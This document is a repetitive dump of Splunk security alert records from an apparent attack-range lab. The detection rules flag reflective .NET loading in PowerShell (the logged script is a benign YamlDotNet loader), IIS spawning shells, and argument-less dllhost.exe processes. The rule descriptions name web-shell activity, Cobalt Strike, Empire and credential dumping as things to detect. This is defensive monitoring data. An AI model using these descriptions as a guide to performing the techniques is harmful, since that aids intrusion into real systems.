[Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665003331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665003331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665002631, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="20", dest="exchange01.attackrange.local", firstTime="2022-10-05T19:13:28", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:13:28", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="9092", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5252", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="23420", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="20732", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="18792", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="18784", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="18468", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17752", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17676", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17648", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", 